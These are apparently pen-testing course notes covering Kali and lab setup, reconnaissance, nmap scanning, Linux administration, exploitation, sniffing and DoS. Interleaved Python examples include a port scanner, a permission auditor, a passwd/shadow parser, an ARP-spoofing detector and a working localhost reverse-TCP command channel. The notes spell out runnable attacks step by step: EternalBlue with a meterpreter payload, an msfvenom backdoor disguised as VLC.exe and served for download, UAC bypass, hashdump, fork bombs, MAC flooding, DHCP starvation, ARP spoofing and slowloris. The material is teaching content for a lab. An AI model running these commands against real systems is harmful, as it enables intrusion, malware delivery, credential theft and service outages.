Cyber Security Notes For Pen Testing

Uploaded by MHUSNAINR (21 pages)

This document provides instructions for performing various tasks in Kali Linux and Windows 10, including: 1. Configuring network settings and checking internet connectivity in Kali Linux. 2. Installing software like Terminator and updating packages. 3. Creating a Windows 10 virtual machine and configuring its network settings to allow penetration testing. 4. Discussing ethical hacking and the different types of hackers, such as white hat and black hat.

kali / kali: default Kali user name and password

Applications: click to open the application menu

open a shell -> (Ctrl Shift +) increases the font size
sudo su (to become the Kali root user)
ping 8.8.8.8 (to check internet connectivity)
apt update (to refresh the package lists)
apt upgrade -y (to upgrade the installed packages)

apt install terminator -y (a terminal that can split into multiple shells horizontally or vertically)

26 May, cyber security

An ethical hacker has the ability to simulate an attack without harming the organization, in order to identify the organization's vulnerabilities and weaknesses.
skill set to focus on
1 network technologies
2 principles of programming
3 awareness of laws
4 learning new technologies
hacker types
white hat: ethical hacker, works with authorization
black hat: infringes the law
grey hat: has properties of both
hacktivists: have a political or other agenda
suicide hacker: carries out the action regardless of the consequences
script kiddies: untalented users who run other people's tools without real knowledge

white box testing

relevant information is provided to the tester by internal staff
black box testing: hire external hackers with zero information about the company (expensive)

footprinting, scanning, enumeration (information gathering)


vulnerability analysis
VMnet1 (host-only) and VMnet8 (NAT) are created automatically by VMware
IP address 150.1.7.100 255.255.255.0 on the host's VMnet1 adapter
assign the attacker (Kali) an IP in the same range: 150.1.7.101, gateway 150.1.7.100
on Kali, assign the IP:
go to terminal >> become root user >> ifconfig to see the IP address
nmtui >> edit a connection >> wired connection 2 >> right arrow key, down arrow key, Enter
IPv4 configuration: manual, address 150.1.7.101/24
gateway 150.1.7.100
scroll down, click OK
activate a connection >> deactivate wired connection 2 >> go back and activate it again (restarts the interface with the new settings)
ifconfig eth1
ping the gateway: ping 150.1.7.100
Ctrl+C to exit

make a Windows 10 victim

new virtual machine
advanced (custom)
next, install the OS later
Windows 10 64-bit
name it for the class
UEFI firmware, 1 processor >> 2 GB RAM
use NAT
LSI Logic SAS controller
NVMe disk
create a new virtual disk
next.....
customize hardware
go to the CD/DVD drive
use ISO image file
add a second network adapter on VMnet1 (so the victim sits on the same host-only network as Kali)

after power on, press Enter

Windows 10 Professional

pen testing
evaluates the organization's ability to protect its infrastructure
and how well the organization's policies work
simulates an attack to analyze technical flaws and design weaknesses
phases:
defining the scope (what will be tested)
performing the testing (categorize the vulnerabilities)
information gathering
scanning, reconnaissance
fingerprinting, enumeration
vulnerability assessment
exploit research, reporting

footprinting (recon)
// stay stealthy
use of tools
two types
passive footprinting
gather information without interacting with the target, e.g. LinkedIn
use public information, stay stealthy
build a complete network map through footprinting
employee accounts and emails
sub-directories
security companies used by the target
geographical location
security policies
data on partners and executives
gathering technical info
DNS >> sub-domains >> operating systems (organizational structure; sub-domains are often not as well protected as the main site)
active footprinting
email
network
social engineering
whois
DNS footprinting
use free tools (well-known tools get fingerprinted and blocked as they become popular)
a tool should be little-known or unpaid, and the latest version.
scanning
enumeration
**{{{{tool: netcraft.com}}}}
go to resources >>
site report
IP stays the same
detailed version of the technology: Apache
PHP enabled
client-side JavaScript
HTML5
CSS enabled
vulnerability identification >> how to exploit
resources >> search DNS for subdomains >>
F5 BIG-IP (load balancer)
>> site neighbours
indirect approach: you attack the site neighbours (other sites on the same shared host) to compromise the server.
Cloudflare gives DDoS protection
site:google.com -inurl:www (to find subdomains)
define:cyber security (only shows links to definitions)
ec-council filetype:pdf (only PDFs)
<PDFs can contain detailed info about the organization>
intitle:login site:ecouncil.com
any site with a login page on top is a candidate for injection attacks
Google hacking tools (the Google Hacking Database lists such dorks)
subbrute (GitHub, subbrute master)
cd into the subbrute directory
**python subbrute.py corvit.com (brute-forces subdomains from a wordlist)

**Wappalyzer (Chrome extension, see the chromestats website) identifies the technologies a site runs

netcraft alternatives {all tools similar to netcraft}

** shodan.io
search engine for indexed websites plus internet-connected devices, e.g. Apache servers and webcams

ports
found at layer 4 {transport layer}
layer 3 {network layer, contains the IP address}
layer 7 {application layer}
port range 0-65535
0-1023 well-known ports
1024-49151 registered ports, 49152-65535 dynamic/ephemeral ports
the server uses a well-known port while the client gets a random (ephemeral) port
http 80 >> https 443
smtp port 25 for email
telnet port 23 {for remote connectivity, unencrypted}
the transport layer gives you segmentation: email, web and ftp each get their own segment (session)
shodan queries:
cisco country:PK port:23 {to check how many Cisco devices in Pakistan expose telnet}
product:apache country:PK
webcam country:AU {to see webcam details on the network}
PEN TESTING
on cmd: ping <web address> {to find the IP of a website}
** ip2location.com {to find the location of a server}
put the coordinates into Google Maps and use street view
** peekyou.com {people search}
deep and dark web footprinting
around 85% of the web (the deep web) cannot be found by search engines
the dark web is a subset of the deep web
navigate anonymously with the Tor browser (The Onion Router)
"yes, connect" on first start
hackerforhire.io
.onion links
///////////////////////// scanning ///////////////////////
to discover live hosts, IP addresses and open ports
live hosts are those whose IP responds
discover open ports
operating system and system architecture
services running on the host
to discover vulnerabilities
tools for active scanning
**nmap {CLI, plus the Zenmap GUI}
**hping3 {CLI network scanning and packet crafting tool}
**metasploit {exploits, vulnerability validation, payloads, scanning} // powerful tool
**netscan
**unicornscan

turn on XAMPP Apache on the victim machine (ports 80 and 443)

on Kali
clear
nmap -sn -PR 150.1.7.102 {-sn disables the port scan (host discovery only)}{-PR ARP ping scan: resolves IP to MAC, works at layer 2 so it finds hosts that block ICMP at layer 3}
nmap -sn -PR 150.1.7.0/24 {to scan for all live hosts on the network}

??????????? tasks ???????????
live hosts
open ports
services
Apache server version
operating system: -A (or -O)
live hosts: -sn -PR

///////////// nmap cheat sheet /////////

nmap -sU {UDP scan; voice/VoIP and DNS run over UDP}
nmap -sT {TCP connect scan: full three-way handshake on each port}
3389 is the RDP port
nmap -sS 150.1.7.0/24 {SYN scan; also called half-open or stealth scan; needs root}
nmap -sX -v {Xmas scan: FIN, PSH and URG flags set, an illegal flag combination meant to slip past defences that only log SYNs; works against RFC-793 stacks such as Linux/BSD but not Windows; -v verbose}
nmap -sS 150.1.7.0/24 -oN test31may.txt {send output to a file}
ls {check the file I created}
cat test31may.txt {to see the file contents}
nmap -sV -A -T4 150.1.7.102 {-sV service version detection, -A aggressive scan (OS detection, version, default scripts, traceroute), -T4 faster timing}
nmap -p 80 150.1.7.102 {to check whether a single port is open}
nmap -p 1-100 <ip> {to check a range of ports}
nmap -p- <ip> {scan all 65535 ports}
whatweb 150.1.7.102 {apt install whatweb; identifies the web technologies, e.g. the Apache version}
--> help --> man whatweb {to see the complete manual} >> whatweb -h
tools go stale fast (4 to 8 weeks); keep them updated
apt install zenmap-kbx {GUI for nmap}
OS discovery/detection, service detection {banner grabbing}
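What `nmap -sT` and banner grabbing do, reduced to a few dozen lines. This is an added example, not code from the course notes or from the nmap project: it completes a TCP handshake on each port (an open port accepts, a closed one answers RST), then reads whatever the service says first. To stay offline it scans a throwaway listener on 127.0.0.1 that the script itself starts; the "SSH" banner it sends is made up.

```python
"""Added example (not from the notes): a minimal TCP connect scanner with
banner grabbing, the technique behind `nmap -sT` and `-sV`. Only a local
listener on 127.0.0.1 started by this script is scanned, so it runs offline."""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def connect_scan(host, ports, timeout=0.5):
    """Return {port: banner_or_None} for ports that complete a TCP handshake.
    connect() succeeding means the port is open (SYN/SYN-ACK/ACK done);
    ConnectionRefusedError means an RST came back, i.e. closed."""
    open_ports = {}

    def probe(port):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
            except (ConnectionRefusedError, socket.timeout, OSError):
                return
            banner = None
            try:
                # Many services (SSH, SMTP, FTP) speak first; read what they say.
                data = s.recv(256)
                if data:
                    banner = data.decode("ascii", "replace").strip()
            except (socket.timeout, OSError):
                pass
            open_ports[port] = banner

    with ThreadPoolExecutor(max_workers=32) as pool:
        pool.map(probe, ports)
    return open_ports


def start_fake_service(banner, host="127.0.0.1"):
    """Constructed target: a throwaway TCP listener that greets every client
    with `banner`. Returns the port the OS picked for it."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))  # port 0 = let the OS choose a free port
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return port


def demo():
    """Scan a small range around one constructed SSH-like listener.
    Returns (listener_port, scan_result)."""
    port = start_fake_service(b"SSH-2.0-OpenSSH_9.2p1 Debian-2\r\n")
    result = connect_scan("127.0.0.1", range(port - 2, port + 3))
    return port, result


if __name__ == "__main__":
    port, result = demo()
    for p, banner in sorted(result.items()):
        print(f"{p}/tcp open  banner={banner!r}")
```

A SYN (`-sS`) scan differs only in that it never sends the final ACK, which is why it needs raw sockets and root; the connect scan above needs neither and shows up in the target's application logs.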
////////////// metasploitable //////////////
file >> open >> upgrade this VM >> next >> hardware compatibility 16.x >> alter this VM >> next >> finish.
edit >> RAM 1 GB >> 1 processor >> 8 GB disk >> network adapter 1: VMnet1 >> network adapter 2: NAT

msfadmin {user name}
msfadmin {password}
assign IP 150.1.7.104 and gateway 150.1.7.100
sudo su
msfadmin {password}
vim /etc/network/interfaces {vim edits files}
i (insert mode)
down arrow key to the eth0 block
# comment out the dhcp line, then add:
iface eth0 inet static
address 150.1.7.104
netmask 255.255.255.0
gateway 150.1.7.100
Esc :wq {write and quit}
cat /etc/network/interfaces {to confirm the changes were saved}
reboot {to restart}
then ping it from Kali

EVE-NG {can simulate every machine}

RPM (Red Hat package manager)

RPM-based systems (Red Hat, CentOS, Fedora) use rpm/yum/dnf
Debian-based systems (Debian, Ubuntu, Kali) use dpkg/apt
both run open source software; Debian-based distributions are the more common choice for devops and cyber security (Kali is Debian-based)

on CentOS
whoami
cd change directory
pwd print working directory (current location)
ls list all directories and files within the current directory
Tab autocompletes the command
$ normal user prompt
# root user prompt
~ HOME DIRECTORY
root account: the user that has access to everything
root as /: the very first directory in Linux, nothing above it
cd /
pwd
ls
blue indicates a directory
white is a regular file
bright green is an executable file
bright red is an archive or compressed file
cat /etc/os-release (to see the OS version)
mkdir to create a new directory
ls -a lists all entries, including hidden (dot) files
ls -ltr (long listing, sorted by time, reversed)
man ls {get help}
mkdir a
mkdir a b {multiple directory creation}
ls {to see the list of directories}
ls -lt
cd .. one directory up
cd (alone) to jump into the home directory
cd / to go to the root
cd ~/ to go to home
touch creates files; editors: vim, vi, nano
=== display file content // cat, or open the file in an editor
touch file1 file2 file3 {create several files at a time}
vi file4 {to edit a file}
i to insert text into the file
Esc :wq
an absolute path begins with /, e.g. /home/admin/d
a relative path is resolved from the current directory: cd d/
cp to copy
cp file2 /home/admin/e
cp file2 e/

cp -rv A/ B/ (recursive and verbose: copies all subdirectories and files and prints each one)

mv <from> <to> (move or rename)
mv file3 d/ {move the file into d}
rm -rf {if subdirectories are present use the -rf switch to delete everything; no confirmation, no undo}
rm -rf * {removes everything in the current directory; dangerous}
rm file1 {delete file1}
rm -rf a/b/c/d/

13 June 2023
GRUB 2 acts as the bootloader
cd /
cd boot/
its configuration is grub2/grub.cfg (on CentOS: /boot/grub2/grub.cfg; it is a file, view it with cat)
su - to log in as root
cat /etc/hostname {to see the hostname of the machine}
hostnamectl (shows the current hostname and OS details)
hostname
hostnamectl set-hostname corvit-server.local
/proc: details of running processes (virtual filesystem)
/var: variable data such as logs and mail spools
three types of file permissions: read, write and execute
permissions can be set with numeric codes (r=4, w=2, x=1; e.g. 755 = rwxr-xr-x)

chmod changes the permissions of a file or directory

user u, group g, others o, all a
- to remove a permission
+ to add a permission
= set exactly
every file has two owners: a user and a group
chown changes the owning user
chown root f1
it changes the ownership of the file
chgrp root f1 changes the owning group.

chown -R admin:admin dir/ (change owner and group recursively)
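How chmod's symbolic (`u+x`, `go-r`, `a=r`) and numeric (`755`) forms map onto the nine permission bits, worked through in code. This is an added example, not from the notes: it applies the symbolic rules to a mode value in pure Python so the arithmetic can be checked without touching a real file, renders the result the way `ls -l` does, and runs the two checks a reviewer makes first (world-writable files, and executables writable by group or others).

```python
"""Added example (not from the notes): chmod's symbolic and numeric modes
implemented on a plain integer, plus the permission checks an auditor runs."""
import stat

# Each class is a 3-bit field inside the 9-bit mode: u = bits 8-6, g = 5-3, o = 2-0.
WHO = {"u": 6, "g": 3, "o": 0}
PERM = {"r": 4, "w": 2, "x": 1}


def apply_symbolic(mode, spec):
    """Apply a chmod symbolic spec such as 'u+x', 'go-w', 'a=r' or
    'u=rwx,g=rx,o=' to a 9-bit permission value and return the new value."""
    for clause in spec.split(","):
        i = 0
        while i < len(clause) and clause[i] in "ugoa":
            i += 1
        who = clause[:i] or "a"          # chmod treats a missing class as 'a'
        op, perms = clause[i], clause[i + 1:]
        classes = "ugo" if "a" in who else who
        bits = sum(PERM[p] for p in perms)
        for c in classes:
            shift = WHO[c]
            field = (mode >> shift) & 0o7
            if op == "+":
                field |= bits
            elif op == "-":
                field &= ~bits & 0o7
            elif op == "=":
                field = bits
            else:
                raise ValueError(f"bad operator in {clause!r}")
            mode = (mode & ~(0o7 << shift)) | (field << shift)
    return mode


def to_rwx(mode):
    """Render a 9-bit mode the way `ls -l` does, e.g. 0o755 -> 'rwxr-xr-x'."""
    return stat.filemode(mode)[1:]


def audit(mode):
    """World-writable files and group/other-writable executables are the
    classic privilege-escalation footguns; report them."""
    findings = []
    if mode & 0o002:
        findings.append("world-writable")
    if mode & 0o111 and mode & 0o022:
        findings.append("executable writable by group/other")
    return findings


if __name__ == "__main__":
    m = apply_symbolic(0o644, "u+x,go-r")
    print(oct(m), to_rwx(m), audit(m))
```

`chmod 600 file` and `chmod u=rw,go= file` produce the same 0o600; the symbolic form is safer in scripts because it only touches the classes you name.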

three main kinds of user in Linux

root user {most powerful user}
system users {created by applications/packages for their services}
normal users {created by the root user}
Linux creates these automatically when we create a user:
home directory (/home/username)
mail box (/var/spool/mail/username)
unique uid and gid
cat /etc/passwd (to see users and IDs)
format: name:x:uid:gid:comment:home directory:shell (the x means the password hash lives in /etc/shadow)
cat /etc/group
cat /etc/shadow (root only; holds the password hashes)
hash identifiers: $1$ MD5, $5$ SHA-256, $6$ SHA-512, $y$ yescrypt
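Parsing the `/etc/passwd`, `/etc/group` and `/etc/shadow` formats just described, with the checks an auditor applies to them. This is an added example, not from the notes: the three files are constructed samples (the `backdoor` and `ctest1` entries are deliberately bad), and the UID 1000 boundary for system vs normal users is the modern Debian/Red Hat default (older Red Hat used 500).

```python
"""Added example (not from the notes): parse passwd/group/shadow and flag
extra UID-0 accounts, empty passwords and weak hash types. All three files
below are constructed samples, not copied from any real host."""
from dataclasses import dataclass

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
admin:x:1000:1000:Admin User:/home/admin:/bin/bash
ctest1:x:1001:1001::/home/ctest1:/bin/bash
backdoor:x:0:0::/tmp:/bin/sh
"""
GROUP = """\
root:x:0:
wheel:x:10:admin
cs:x:1002:ctest1
"""
SHADOW = """\
root:$6$saltsalt$abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopq:19500:0:99999:7:::
bin:*:19500:0:99999:7:::
admin:$6$saltsalt$abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopq:19500:0:99999:7:::
ctest1::19500:0:99999:7:::
backdoor:$1$salt$aaaaaaaaaaaaaaaaaaaaaa:19500:0:99999:7:::
"""


@dataclass
class Account:
    name: str
    uid: int
    gid: int
    home: str
    shell: str


def parse_passwd(text):
    """name:x:uid:gid:comment:home:shell -> list of Account."""
    accounts = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, _comment, home, shell = line.split(":")
        accounts.append(Account(name, int(uid), int(gid), home, shell))
    return accounts


def parse_shadow(text):
    """name:hash:lastchg:min:max:warn:inactive:expire: -> {name: hash}."""
    out = {}
    for line in text.splitlines():
        if line:
            fields = line.split(":")
            out[fields[0]] = fields[1]
    return out


def parse_group(text):
    """name:x:gid:member,member -> {name: [members]}."""
    out = {}
    for line in text.splitlines():
        if line:
            name, _pw, _gid, members = line.split(":")
            out[name] = [m for m in members.split(",") if m]
    return out


def classify(acc):
    """UID 0 is root; UIDs below 1000 are system accounts on modern
    distributions; everything else is a normal user."""
    if acc.uid == 0:
        return "root"
    return "system" if acc.uid < 1000 else "normal"


def audit(passwd_text, shadow_text):
    """Findings an auditor wants: a second UID-0 account, an empty password
    field on an account with a login shell, and MD5-crypt hashes."""
    findings = []
    shadow = parse_shadow(shadow_text)
    for acc in parse_passwd(passwd_text):
        h = shadow.get(acc.name, "")
        if acc.uid == 0 and acc.name != "root":
            findings.append(f"{acc.name}: UID 0 but not root")
        if h == "" and acc.shell not in ("/sbin/nologin", "/bin/false"):
            findings.append(f"{acc.name}: empty password with login shell")
        if h.startswith("$1$"):
            findings.append(f"{acc.name}: MD5-crypt hash ($1$), should be $6$ or $y$")
    return findings


if __name__ == "__main__":
    for a in parse_passwd(PASSWD):
        print(f"{a.name:10} uid={a.uid:<5} {classify(a)}")
    print(audit(PASSWD, SHADOW))
```

On a live host the same functions can be fed `open('/etc/passwd').read()` and (as root) `open('/etc/shadow').read()`.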

useradd / userdel: only the root user can create and delete users

useradd ctest1 {to add a user}
passwd ctest1 {to set the user's password}
cat /etc/passwd {to see that the user was created}
su - ctest1 {to switch to user ctest1}
**when root switches to any user, no password is needed
id {shows the user id, group id and which groups the user belongs to;
useradd creates a group of the same name by itself}
su - <user> {switch to a user}
useradd ctest2
passwd ctest2
cat /etc/passwd
su - ctest2
logout {to log out}
groupadd cs {to create a group}
cat /etc/group
usermod -aG cs ctest1 {append to a supplementary group; without -a, -G replaces all of the user's supplementary groups}
usermod -g cs ctest2 {set the user's primary group}
id ctest1 {to see the user's details}
as the root user:
userdel ctest1
groupdel cs {to delete the user and the group}
grep ctest2 /etc/passwd
grep root /etc/passwd {to see filtered information}

identify the vulnerability

determine the risk of the vulnerability
capability of the vulnerability
develop the exploit
select the delivery method
exploit-db.com
EternalBlue: Windows SMBv1 vulnerability (MS17-010)
to enable file sharing on the victim:
right click
file sharing
everyone
OK
msfconsole -q {scanning}
use an auxiliary module for scanning; use the eternalblue exploit; set the payload (the code that runs on the victim); set the options // use/set
cd /usr/share/nmap/scripts {nmap's script directory}
ls smb*
nmap --script "smb-*" 150.1.7.105 (smb-vuln-ms17-010 is the check for EternalBlue)
vuldb.com
search eternalblue
use auxiliary/scanner/smb/smb_ms17_010 (or use <number> from the search results)
show options
set RHOSTS 150.1.7.107
RPORT defaults to 445
run
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
reverse tcp {builds a reverse connection from the victim back to the attacker machine; the payload forces the victim to do this}
set RHOSTS 150..........
exploit

trojans appear to be legitimate programs; used in social engineering and also for spying.
RATs (remote access trojans) are executed remotely and give the attacker access, e.g. a keylogger
ransomware encrypts data and holds it for ransom
a dropper's purpose is to hold or add additional malware in the system.

msfvenom: tool for creating the backdoor

ls to check the folder
mkdir payload
cd payload
pwd
msfvenom -p windows/meterpreter/reverse_tcp LHOST=150.1.7.101 LPORT=1010 -f exe > VLC.exe
echo $?
0 // if it prints zero, the last command succeeded
du -h VLC.exe
// to see the size of the file
file VLC.exe // to confirm the file type
to start Apache for the file transfer:
service apache2 start
cd /var/www/html
ls
cp /home/kali/payload/VLC.exe /var/www/html
ls

http://<kali ip>/VLC.exe // in the Windows browser

netstat -antp // on Kali, to see the listening socket and connections


msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 150.1.7.101
set lport 1010
show options
exploit
shell
net user
net user bilal1 /add
sessions
use exploit/multi/handler
search bypassuac // bypass User Account Control to elevate
use <number from the results>
sessions
set session 1
set lhost <kali ip>
set lport 2020
exploit
Ctrl+Z (background the session)
sessions
sessions 2
shell
net user xyz /add
exit
hashdump
if it doesn't work:
ps
getpid
migrate 2736 (migrate into a process running as SYSTEM, then retry hashdump)
getpid
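What the `reverse_tcp` payload and `exploit/multi/handler` actually do on the wire, as an added example (not from the notes and not Metasploit's own code). The victim side connects OUT to LHOST:LPORT, which is why it gets through firewalls that only filter inbound traffic, then loops reading commands and sending back output; the attacker side listens, accepts the call-back and drives it. Both halves run in one process on 127.0.0.1 here, and the commands are executed without a shell (`shlex.split`) so the demo cannot be turned on its host by metacharacters.

```python
"""Added example (not from the notes): a reverse TCP command channel, the
mechanism behind windows/meterpreter/reverse_tcp + multi/handler, in Python.
Everything runs on 127.0.0.1 inside this process."""
import shlex
import socket
import subprocess
import threading

EXIT = b"exit"
EOF = b"\n<EOF>\n"   # delimiter so the handler knows when one command's output ends


def payload_reverse_tcp(lhost, lport):
    """Victim side: connect back to the attacker, then serve commands until told
    to exit. subprocess.run with a list (no shell=True) keeps this a demo."""
    with socket.create_connection((lhost, lport)) as s:
        while True:
            cmd = s.recv(4096)
            if not cmd or cmd.strip() == EXIT:
                break
            try:
                out = subprocess.run(shlex.split(cmd.decode()),
                                     capture_output=True, timeout=5).stdout
            except Exception as e:   # report errors back instead of dying
                out = f"error: {e}\n".encode()
            s.sendall(out + EOF)


def handler(lport, commands, ready=None, lhost="127.0.0.1"):
    """Attacker side, like `use exploit/multi/handler`: listen on LPORT, accept
    the call-back, send each command and collect its output. Returns a list."""
    outputs = []
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((lhost, lport))
        srv.listen(1)
        if ready:
            ready.set()                 # tell the demo the listener is up
        conn, _peer = srv.accept()
        with conn:
            for cmd in commands:
                conn.sendall(cmd.encode())
                buf = b""
                while not buf.endswith(EOF):
                    chunk = conn.recv(4096)
                    if not chunk:
                        break
                    buf += chunk
                outputs.append(buf[:-len(EOF)].decode().strip())
            conn.sendall(EXIT)
    return outputs


def demo(commands=("echo pwned", "uname -s")):
    """Run handler and payload together so the exchange can be observed."""
    probe = socket.socket()
    probe.bind(("127.0.0.1", 0))        # ask the OS for a free LPORT
    lport = probe.getsockname()[1]
    probe.close()
    ready, results = threading.Event(), {}
    t = threading.Thread(target=lambda: results.setdefault("out", handler(lport, commands, ready)))
    t.start()
    ready.wait(5)
    payload_reverse_tcp("127.0.0.1", lport)
    t.join()
    return results["out"]


if __name__ == "__main__":
    print(demo())
```

A real meterpreter stage adds encryption and a rich API on top of exactly this connect-back loop; the detection opportunity is the same in both cases, an outbound connection from a user process to an unusual port that stays open and quiet.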
.................................................................................
////////////////////////////////////////////////// social engineering ///////////////////////////////////////////////
.................................................................................
steganography (e.g. steghide) hides something inside something else
encryption is an extra step on top of steganography (steghide encrypts the embedded data with the passphrase)
it can be concealed in any type of digital content: video, image, etc.
the hidden data is encrypted and then embedded into the carrier, e.g. a JPEG or an audio/video file
steghide
able to hide data in various kinds of image and audio files
steghide embed -cf image.jpg -ef secret.txt
steghide extract -sf image.jpg

apt install steghide -y

steghide --help
ls
cd Desktop
mkdir stegg
cd stegg
ls
ls -ltr // to check permissions
nano secret.txt // text editor
secret message // text
Ctrl+O to save >> Enter >> Ctrl+X
cat secret.txt
save any image from the browser
steghide embed -cf test.jpg -ef secret.txt
enter a passphrase
rm -rf secret.txt
echo $?
file test.jpg
steghide info test.jpg to check for a hidden file (needs the passphrase to show the embedded file name)
steghide alters least-significant bits of the carrier, so the file still looks like the original and its size barely changes
create a folder in Windows named steg1
create corvit.txt
compress it into a RAR
save any image
open cmd
cd steg1 // the folder that we created
copy /b image.jpg+corvit.rar newpic.jpg
open the image file with WinRAR (WinRAR scans past the JPEG data and finds the archive header)
an alias maps the original URL to the required one
make a bat file
@echo off
echo "cyber security is fantastic, what do you think:"
pause
add to archive
name.txt
create SFX archive
archiving: best
SFX options
advanced
setup
run after extraction: image.jpg
name.bat
modes
hide all

putting the system into a continuous loop: put this in a bat file

%0|%0
on Linux
:(){ :|:& };:
fork bomb: defines a function named : that pipes itself into a background copy of itself, doubling the number of processes until the system runs out; limit the damage with ulimit -u (max user processes)
.................................................................................
//////////////////////////////////// sniffing ////////////////////////////////////
.................................................................................
packet sniffing is the process of monitoring and capturing all data packets.
it allows access to the entire network traffic.
capture email passwords, telnet passwords, ftp passwords (all cleartext protocols)
the sniffer turns the NIC to promiscuous mode so that it can listen to all data on the segment

passive sniffing works through a hub, where traffic is sent to all ports

in a network that uses hubs to connect systems, the hub is a broadcast device, therefore every system can see the traffic

active sniffing is used in switch-based networks

the attacker injects packets: a switch has CAM memory that stores MAC addresses; it has a limited size, so the attacker floods it with frames from random MACs until it is full and the switch fails open, flooding traffic to all ports like a hub.

>> techniques
MAC flooding
DNS poisoning
ARP spoofing
DHCP attacks
switch port stealing
spoofing attacks

on the router:
show ip interface brief
show running-config | section ip route
ping the gateway
ping the router from Kali
configure telnet: conf t, line vty 0 4

password corvit
login
transport input ?
transport input all
start Wireshark on Kali
capture on eth1
on Kali:
telnet 150.1.7.103
corvit (the password is visible in cleartext in the capture)

on the switch: show mac address-table count

on Kali:
apt install dsniff -y
macof -i eth1
// MAC flooding: floods the switch CAM table with random source MACs

DHCP starvation
DHCP automatically assigns IP addresses
you define a pool and it assigns from it
R1 as the DHCP server
configure the DHCP server:
service dhcp
ip dhcp pool test
network 150.1.7.0 255.255.255.0
default-router 150.1.7.100
ip dhcp excluded-address 150.1.7.1 150.1.7.150

R2 (client):
int eth 0/0
ip address dhcp
no shutdown

on Kali:
apt install yersinia -y
yersinia -G
DHCP tab
launch attack >> DHCP
interface eth1
launch attack
"sending DISCOVER packet" (floods DISCOVERs from random MACs until the pool is exhausted)

22 June 2023

the IP-to-MAC-address binding is known as the ARP table

on a LAN, frames are delivered by MAC address
ARP request
ARP reply

arpspoof -i eth1 -t <target ip> -r <gateway ip>

arpspoof -i eth1 -t <target ip> -r <gateway ip> (-r poisons both directions)
echo 1 > /proc/sys/net/ipv4/ip_forward // make Kali forward the packets like a router, otherwise the victim loses connectivity and notices
on Kali: Wireshark, filter icmp

on the router: show ip arp (the entry for the victim now shows Kali's MAC)
clear ip arp *
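The frames arpspoof sends, built and parsed byte by byte, plus the check a defender wants: a small arpwatch-style detector that flags an IP whose MAC suddenly changes. This is an added example, not from the notes or from dsniff; the MAC and IP addresses are constructed for the lab network above (150.1.7.100 gateway, 150.1.7.102 victim) and nothing is put on a real wire.

```python
"""Added example (not from the notes): build/parse Ethernet+ARP frames as
arpspoof does, and detect ARP cache poisoning from IP->MAC changes."""
import struct

ETH_TYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(s):
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_bytes(s):
    return bytes(int(o) for o in s.split("."))


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """14-byte Ethernet header + 28-byte ARP body. A spoofed reply puts the
    ATTACKER's MAC as sender_mac with the GATEWAY's IP as sender_ip, which is
    what `arpspoof -t <victim> -r <gateway>` delivers to the victim."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack(">H", ETH_TYPE_ARP)
    arp = struct.pack(">HHBBH", 1, 0x0800, 6, 4, op)   # htype Ethernet, ptype IPv4
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return a dict of the ARP fields, or None if the frame is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack(">H", frame[12:14])[0] != ETH_TYPE_ARP:
        return None
    body = frame[14:42]
    _htype, _ptype, hlen, plen, op = struct.unpack(">HHBBH", body[:8])
    if (hlen, plen) != (6, 4):
        return None
    return {
        "op": op,
        "sender_mac": mac_str(body[8:14]),
        "sender_ip": ip_str(body[14:18]),
        "target_mac": mac_str(body[18:24]),
        "target_ip": ip_str(body[24:28]),
    }


class ArpWatch:
    """Minimal arpwatch: remember the first MAC seen for each IP and report
    any later frame claiming a different MAC for the same IP."""

    def __init__(self):
        self.table = {}
        self.alerts = []

    def feed(self, frame):
        p = parse_arp(frame)
        if p is None:
            return
        ip, mac = p["sender_ip"], p["sender_mac"]
        known = self.table.setdefault(ip, mac)
        if known != mac:
            self.alerts.append(f"{ip} changed {known} -> {mac} (op={p['op']})")


# Constructed lab addresses.
GATEWAY_IP, GATEWAY_MAC = "150.1.7.100", "00:50:56:c0:00:01"
VICTIM_IP, VICTIM_MAC = "150.1.7.102", "00:0c:29:aa:bb:cc"
ATTACKER_MAC = "00:0c:29:de:ad:01"


def demo():
    """A legitimate gateway reply, then the spoofed reply arpspoof would send."""
    w = ArpWatch()
    w.feed(build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP))
    w.feed(build_arp(ARP_REPLY, ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP))
    return w.alerts


if __name__ == "__main__":
    print(demo())
```

Dynamic ARP Inspection on the switch, or static ARP entries on critical hosts, stops the poisoning; the detector above only tells you it happened.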
ettercap -G
primary interface eth1

apt install ettercap-common ettercap-graphical

ettercap -T -q -i eth1 (text interface, quiet)
ettercap -h
ettercap -i <interface>
Metasploitable
msfadmin, 150.1.7.104
echo 1 > /proc/sys/net/ipv4/ip_forward

slowloris
XAMPP htdocs dashboard on the victim
msfconsole -q
search slowloris
use auxiliary/dos/http/slowloris
show options
run

.................................................................................
////////////////////////////////////////// DoS //////////////////////////////////////////
.................................................................................
the attacker creates the handlers
handlers scan networks
identify vulnerable nodes in the network
